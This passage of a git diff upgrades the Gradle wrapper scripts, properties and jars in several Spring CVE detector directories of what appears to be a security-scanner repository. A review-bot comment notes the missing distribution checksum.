"$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/spring_cloud_function_cve_2022_22963/gradlew.bat b/community/detectors/spring_cloud_function_cve_2022_22963/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/spring_cloud_function_cve_2022_22963/gradlew.bat +++ b/community/detectors/spring_cloud_function_cve_2022_22963/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.jar b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.properties b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@
 distributionBase=GRADLE_USER_HOME
 distributionPath=wrapper/dists
-distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip
+distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip
+networkTimeout=10000
+validateDistributionUrl=true
 zipStoreBase=GRADLE_USER_HOME
 zipStorePath=wrapper/dists
diff --git a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew
index fbd7c5158..1aa94a426 100755
--- a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew
+++ b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew
@@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
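Review bot: The new `distributionUrl` line in spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.properties moves to gradle-7.0-bin.zip, but the hunk shows the whole file and it carries no `distributionSha256Sum`, so the wrapper has nothing to check the downloaded archive against. As far as I know, `validateDistributionUrl=true` concerns the URL itself rather than the archive contents. I would add `distributionSha256Sum=<SHA-256 of gradle-7.0-bin.zip from Gradle's published checksums>` directly under `distributionUrl`. The identical hunk for spring_framework_cve_2022_22965 has the same gap. The neighbouring gradle-wrapper.jar files also change as opaque binaries (62d4c0535..d64cd4917), so their checksums should be compared with Gradle's published wrapper checksums before merging.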
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew.bat b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew.bat +++ b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.jar b/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.properties b/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@
 distributionBase=GRADLE_USER_HOME
 distributionPath=wrapper/dists
-distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip
+distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip
+networkTimeout=10000
+validateDistributionUrl=true
 zipStoreBase=GRADLE_USER_HOME
 zipStorePath=wrapper/dists
diff --git a/community/detectors/spring_framework_cve_2022_22965/gradlew b/community/detectors/spring_framework_cve_2022_22965/gradlew
index fbd7c5158..1aa94a426 100755
--- a/community/detectors/spring_framework_cve_2022_22965/gradlew
+++ b/community/detectors/spring_framework_cve_2022_22965/gradlew
@@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, 